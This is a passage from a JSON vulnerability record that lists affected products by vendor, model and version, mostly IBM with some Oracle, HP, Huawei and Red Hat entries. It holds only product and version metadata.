"vendor": "ibm", "version": "5.0.14.0" }, { "model": "business process manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.1" }, { "model": "flashcopy manager for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.1.0" }, { "model": "java", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.0.590" }, { "model": "tivoli storage manager for virtual environments", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.4.2.0" }, { "model": "db2 express edition fp11", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "tivoli business service manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.1" }, { "model": "content collector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.1" }, { "model": "rational performance tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "initiate master data service provider hub", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "linux enterprise server sp4 ltss", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "tivoli system automation application manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.3" }, { "model": "rational software architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.4.1" }, { "model": "oceanstor v100r001c10", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "18500" }, { "model": "oceanstor vis6600t v200r003c10spc100", "scope": "ne", "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.5" }, { "model": "sterling connect:direct for openvms", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x24078630" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.3.13" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "infosphere biginsights", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "content manager enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.2" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.3" }, { "model": "linux s/390", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "packaging utility", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "rational software architect for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5.2" }, { "model": "db2 advanced workgroup server edition fp11", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "rational collaborative lifecycle management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0" }, { "model": "bladecenter js12 express", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7998-60x)0" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "tivoli storage manager operations center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1100" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.4" }, { "model": "netiq sentinel", "scope": "eq", "trust": 0.3, "vendor": "novell", "version": "7.4.3" }, { "model": "bladecenter -t", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8730" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.4" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.7" }, { "model": "system storage ts3310 tape library 636g", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "business process monitor", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.24" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.6" }, { "model": "java", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.9.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "flex system manager node types", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "87310" }, { "model": "abyp-0t-0s-4l-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1.5" }, { "model": "rational service tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.21" }, { "model": "rational build forge", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.31" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.14" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.13" }, { "model": "java", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.70" }, { "model": "flashsystem 9840-ae1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "840" }, { "model": "powervc standard edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.3" }, { "model": "business process insight", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.0" }, { "model": "rational developer for i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "websphere service registry and repository studio", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "algo one", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "java sdk sr fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7910" }, { "model": "packaging utility", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.8.1" }, { "model": "java", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.11.0" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "350.20" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.0.5" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.01" }, { "model": "1/10gb uplink ethernet switch module", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.4.10.0" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.5" }, { "model": "java", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.3.0" }, { "model": "rational service tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.13" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.2" }, { "model": "tivoli system automation for multiplatforms", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1.13" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0.2" }, { "model": "personal communications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.2" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.6" }, { "model": "infosphere data architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.03" }, { "model": "jrockit r28.3.3", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "db2\u00ae connect? unlimited edition for system z\u00ae", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "rational performance tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6.0.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.15" }, { "model": "sterling connect:direct browser", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4" }, { "model": "flex system chassis management module 2pet12i", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x375087180" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.045" }, { "model": "jre update10", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.0" }, { "model": "bsm connector", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.22" }, { "model": "rational performance tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.7.0.1" }, { "model": "rational developer for power systems software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "sterling connect:direct for openvms", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.6" }, { "model": "sterling connect:direct browser user interface", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.52" }, { "model": "idataplex dx360 m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79130" }, { "model": "jdk update6", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.0" }, { "model": "flex system fc3171 8gb san switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "rational rhapsody design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.0" }, { "model": "rational software architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.37" }, { "model": "jre update7", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.0" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.01" }, { "model": "rational software architect design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.01" }, { "model": "jdk update10", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.0" }, { "model": "flex system chassis management module 2pet10m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "oceanstor 18800f v100r001c30", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "rational doors next generation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.1" }, { "model": "infosphere optim data masking solution", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "11.3.0.3" }, { "model": "java sdk sr16-fp2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "bsm connector", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.23" }, { "model": "packaging utility", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.0.4" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.1" }, { "model": "sterling control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.0.9" }, { "model": "system idataplex dx360 m2 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x73230" }, { "model": "enterprise linux server supplementary eus 6.6.z", "scope": null, "trust": 0.3, "vendor": "redhat", "version": null }, { "model": "spss collaboration and deployment services", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.3" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "java", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.0.0" }, { "model": "enterprise linux desktop supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6.0" }, { "model": "jre update13", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.0" }, { "model": "infosphere optim performance manager for db2 on windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1.1" }, { "model": "content collector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.1" }, { "model": "release control", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.13" }, { "model": "security appscan standard", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.1" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.2" }, { "model": "db2\u00ae advanced workgroup server edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.5" }, { "model": "optim performance manager for db2 on linux", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "rational performance tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.15" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.6" }, { "model": "rational performance tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.3.0.3" }, { "model": "packaging utility", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.0.5" }, { "model": "websphere partner gateway enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.1.3" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.3" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.3" }, { "model": "cognos controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "jrockit r27.8.1", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "spss collaboration and deployment services", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.1.1" }, { "model": "tivoli storage manager operations center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.4100" }, { "model": "db2 workgroup server edition fp11", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "tivoli composite application manager for soa", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "flashsystem 9848-ae1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "840" }, { "model": "db2 query management facility", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "connect-it", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.50" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.2" }, { "model": "java sdk sr5", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "rational developer for aix and linux", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "bladecenter -h", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1886" }, { "model": "java", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.00" }, { "model": "gbesm 1g l2/7", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "rational rhapsody design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.1" }, { "model": "sparc enterprise m4000 xcp", "scope": "ne", "trust": 0.3, "vendor": "oracle", "version": "1121" }, { "model": "notes and domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.3" }, { "model": "(comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "125007)0" }, { "model": "jre(os 1.7.0 45", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "x)" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35001.1" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "java", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.5.0" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.6" }, { "model": "integration toolkit", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.7" }, { "model": "db2\u00ae connect? enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "service manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "hp-ux web server suite hpuxwsatw405", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.05" }, { "model": "system storage ts2900 tape library", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0025" }, { "model": "rational software architect for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "flashsystem 9846-ac1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v840" }, { "model": "power", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5950" }, { "model": "sterling control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.4.1" }, { "model": "cognos controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "jdk update25", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.0" }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.0.3" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "tivoli storage flashcopy manager for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.0" }, { "model": "emptoris spend analysis", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0.4" }, { "model": "business process monitor", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.10" }, { "model": "control center ifix02", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.0.0" }, { "model": "internet explorer", "scope": "eq", "trust": 0.3, "vendor": "microsoft", "version": "0" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2.1" }, { "model": "cognos command center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "flashcopy manager for custom applications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.1" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.3.0.12" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "security identity governance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "(comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "58305)0" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.3" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2" }, { "model": "flex system chassis management module 2pet10b", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.3.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.5" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37006.3" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.5" }, { "model": "rational doors web access", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.43" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.73" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.24" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.2" }, { "model": "rational software architect for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "tivoli business service manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "security network controller 1.0.3376m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "jdk update15", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.0" }, { "model": "power express", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "550" }, { "model": "(comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "75005)0" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2.195" }, { "model": "predictiveinsight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "e6000 chassis v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "netiq sentinel", "scope": "eq", "trust": 0.3, "vendor": "novell", "version": "7.3" }, { "model": "power express f/c", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5504965" }, { "model": "cognos command center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "tivoli provisioning manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "sparc enterprise m8000 xcp", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1118" }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.0.2" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.027" }, { "model": "northstar controller application", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2.1.0" }, { "model": "db2\u00ae connect? application server edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.8" }, { "model": "power", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7700" }, { "model": "msr4000 (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7)0" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.0.0" }, { "model": "(comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "58005)0" }, { "model": "db2 enterprise server edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.1" }, { "model": "rational performance tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.3" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "350.70" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.0" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3850x571460" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.0" }, { "model": "rational doors next generation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.6" }, { "model": "system storage ts3400 tape library", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0039" }, { "model": "ara", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.5.8" }, { "model": "oceanstor s6800t v200r002c20spc200", "scope": "ne", "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.1.0.6" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.025" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x44079170" }, { "model": "db2 connect unlimited edition for system z fp6", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.5" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.8.05" }, { "model": "sterling control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.4.0" }, { "model": "rational software architect for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.5.4" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "rational doors next generation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.5" }, { "model": "oceanstor v100r001c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "18500" }, { "model": "s9700 v200r07sph003", "scope": "ne", "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "installation manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.7.4.1" }, { "model": "content collector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.0.1" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.5" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1" }, { "model": "rational agent controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.3.3" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.18" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.1" }, { "model": "content collector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0.0" }, { "model": "rational service tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.25" }, { "model": "sparc enterprise m3000 xcp", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1118" }, { "model": "packaging utility", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.1" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.4" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.10" }, { "model": "websphere mq internet pass-thru", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.1" }, { "model": "u200a and m (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "packaging utility", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.12" }, { "model": "packaging utility", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.4" }, { "model": "business process manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.1.0" }, { "model": "db2\u00ae connect? unlimited edition for system z\u00ae", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.5" }, { "model": "power express f/c", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5205635" }, { "model": "rational doors web access", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5.21" }, { "model": "netezza platform software", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "tivoli storage manager administration center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3" }, { "model": "packaging utility", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.1" }, { "model": "buildforge", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.3.4" }, { "model": "infosphere guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.211" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.2" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0.2" }, { "model": "db2 advanced enterprise server edition fp6", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.5" }, { "model": "rational performance tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.3.0.1" }, { "model": "websphere mq mqipt", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "rational rhapsody design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.6" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.033" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.3" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.01" }, { "model": "jrockit r27.6.0-50", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.5.015" }, { "model": "flashcopy manager for db2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.0" }, { "model": "mq light", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.0.1" }, { "model": "db2\u00ae express edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "emptoris spend analysis", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.01" }, { "model": "system networking rackswitch g8000", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.70" }, { "model": "rational collaborative lifecycle management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.7" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.1" }, { "model": "java", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.4.0" }, { "model": "abyp-4tl-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "db2\u00ae connect? unlimited edition for system i\u00ae", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "rational application developer", "scope": "eq", 